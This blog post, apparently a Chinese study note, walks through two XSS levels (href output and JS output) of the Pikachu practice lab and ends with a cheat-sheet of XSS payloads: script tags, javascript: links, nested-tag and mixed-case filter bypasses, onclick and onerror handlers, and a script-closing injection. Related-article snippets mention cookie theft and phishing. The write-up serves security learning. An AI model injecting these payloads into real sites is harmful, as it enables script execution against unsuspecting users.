pikachuxss之herf、js输出

原创 已于 2022-09-14 20:38:41 修改 · 1.3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#javascript #前端 #web安全

于 2022-09-14 20:11:45 首次发布
本文详细介绍了XSS攻击中不同类型的payload,如脚本注入、超链接、单标签过滤等,并提供了解决方案,包括基本的script标签XSS和防御措施。

pikachu

xss之herf

F12打开开发者模式发现输入的内容就成为了herf的超链接内容1
输入javascript:alert(1)得到:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jGtATGd9-1663157418135)(https://gitee.com/re_sets/images/raw/master/blog/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-09-14%20192605.png)]

xss之js输出

F12发现输入的内容都放入了js代码当中:image-20220914195251655

那就构造一个</script>让其提前结尾,输入</script><script>alert(2222)</script>显示:image-20220914195414900

xss总结

也就是payload总结,结合F12给的代码,目前学习到了:
<script>alert("XSS")</script> 基本xss
<a href="javascript:alert(1)">XSS Test</a> herf超链接xss
<scr<script>ipt>alert("XSS")</scr<script>ipt> 单一过滤标签xss
<Script>alert("XSS")</sCrIpt> 过滤小写script标签xss
<div οnclick="alert('xss')"> div onclick按钮标签xss
<img src=1 οnerrοr=alert("xss");> img图像xss
</script><script>alert(2222)</script> 提前结束<script>的xss

PiKachu之XSS(跨站脚本)
angry_program的博客
02-19 4519
XSS概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。 XSS是一种发生在前端浏览器端的漏洞,所以其危害的...
Pikachu之XSS
weixin_48621644的博客
10-14 3383
小羊学安全 任重而道远~
web-ctf】ctf-pikachu-XSS
一个努力生活的人的博客
06-27 3137
XSS-pikachu
pikachu靶场第十四关——XSS(跨站脚本)之js输出(附代码审计)
03-25 663
单引号没有被过滤,那么我们只需要将其闭合就行了。
pikachu靶场通关笔记14 XSS关卡10-XSSjs输出(五种方法渗透)
最新发布
mooyuan的网络安全博客
06-04 1481
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到安全风险的真实原因,讲解XSS的原理并进行渗透实践,本文使用5种方法对XSS1第10关卡XSSjs输出进行渗透。
pikachuxss钓鱼
03-04
那么每当有新访客浏览含有这条记录的文章列表页或者其他任何地方读取到了这段JS文件路径的时候,就会自动下载并运行来自指定位置上的外部资源——即所谓的“钓鱼页面”,它可能模仿合法网站界面来欺骗用户提供敏感...
pikachu平台xss漏洞详解
m0_74786138的博客
11-26 3300
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
Pikachu靶场之XSS漏洞
2301_80176211的博客
08-22 719
我们可以看到,我们输入的点击事件还在herf中,我们需要跳出herf,将herf闭合,在点击事件的命令前加一个单引号即可跳出。这时我们从另一个浏览器进入本网站,会发现有弹窗,说明这个js弹窗影响的是所有进入这个网站的用户。说明这时一个点击事件,所以我们要在输入框中输入一个点击事件。输入到这里我们发现无法继续输入了,按F12,查看源代码。我们发现是这里限制了我们的输入,将数值改大一点就可以了。在输入框中随便输入,提交之后我们发现会出现一个点击事件。在表单中我们输入一个弹窗,输入框中随便输入。
pikachu靶场-XSS
braty_的博客
02-21 1845
这里是用get请求做了一个长度的限制,我们使用hackbar来进行传参,页面会弹出一个xss,证明存在xss漏洞,我们顺便讲一下 beef-xss工具。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出前端时被浏览器当作有效代码解析执行从而产生危害。在输入框随便输入 11 ,F12 可以看见,11 被添加在了 标签里面(html的超链接标签)XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
Pikachu靶场:XSS之htmlspecialchars、href输出以及js输出
witwitwiter的博客
04-17 2677
Pikachu靶场:XSS之htmlspecialchars、href输出以及js输出 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 htmlspecialchars()函数把预定义的字符转换为HTML 实体。 预定义的字符是: &(和号)成为&amp ”(双引号)成为&quot '(单引号)成为&#039 ‘’< ‘’(小于)成为&lt ‘’> ‘’(大于)成为 &gt 可用的引号类型︰ ENT_CO
【CTF Web】Pikachu 反射型xss(get) Writeup(反射型XSS+GET请求)
HEX9CF的技术博客
09-28 813
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
xssjs输出
apple12_12的博客
06-06 802
xssjs输出 当用户的输入被输出在了js中,该怎么绕过呢?今天在搞pikachu的时候遇到了这个问题,还是直接闭合标签< script >标签,再插入自己的代码:
皮卡丘xss之htmlspecialchars、xss之href输出xssjs输出
Fly_Mojito的博客
05-30 1227
皮卡丘xss之htmlspecialchars、xss之href输出xssjs输出
【Pikachu靶场:XSS系列】xss之过滤,xss之htmlspecialchars,xssherf输出xssjs输出通关啦
m0_47484034的博客
11-05 735
【Pikachu靶场:XSS系列】xss之过滤,xss之htmlspecialchars,xssherf输出xssjs输出通关啦
pikachu--xss
qq_43660551的博客
04-11 534
alert(document.cookie),f12未发现有用信息,右键看下网页源码,发现被过滤了。两个框输入1
12.xssjs输出
愿听风成曲
06-27 454
根据上面的代码编辑攻击代码,将前端代码中的script闭合,后面的script进行做攻击代码即可。将编辑好的代码直接输入提交,会直接弹出xss界面。接下来将这段代码复制出来进行编辑攻击代码。输入1111之后能看到心中所爱。
pikachu xss系列漏洞实战之盲打、过滤、htmlspecialchars、herf输出js输出
永不垂头的博客
08-08 625
pikachu xss系列漏洞实战之盲打、过滤、htmlspecialchars、herf输出js输出 pikachu xss系列漏洞实战 首先搭建一下后台,需要连接数据库数据库 xss盲打 前端数据交互的地方,输入信息,输入后的结果不在前端显示,也就是 只有后台能看到输入的内容,从前端无法判断是否存在XSS,这种情况下,我们直接往里面插入XSS代码,然后等待 输入信息后: 输入 <script>alert(‘gxy’)</script> 222 登录后台查看
Pikachu xssjs输出
SS_liang的博客
01-09 610
标签里面,就像我们平时的payload:<script>alert(xss)
pikachu xss合集(下)
小城的博客
12-17 1394
大家好,我是小城,一个刚刚起步的学渣,笨鸟先飞,可惜我领悟得太晚。但从现在开始,我会努力加油进取变强!
pikachuXSS
08-30
"pikachuXSS"似乎不是一个标准术语,但从字面意思上看,它可能是将两个词合并形成的一个组合,其中"Pikachu"是一个知名的游戏角色(来自《口袋妖怪》系列),而"XSS"则是跨站脚本攻击(Cross-Site Scripting)的缩写,这是一种网络安全漏洞,通常通过恶意注入HTML或JavaScript代码到网站上,以利用用户信任的站点资源来执行未经授权的操作。 如果这是某种特定场景下的简称,例如某个项目、游戏内的机制或者是技术讨论中的例子,那它可能是指在游戏中或编程环境中利用Pikachu形象做的一种安全教育示例,通过展示如何防止XSS攻击来提升玩家或开发者的安全意识。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值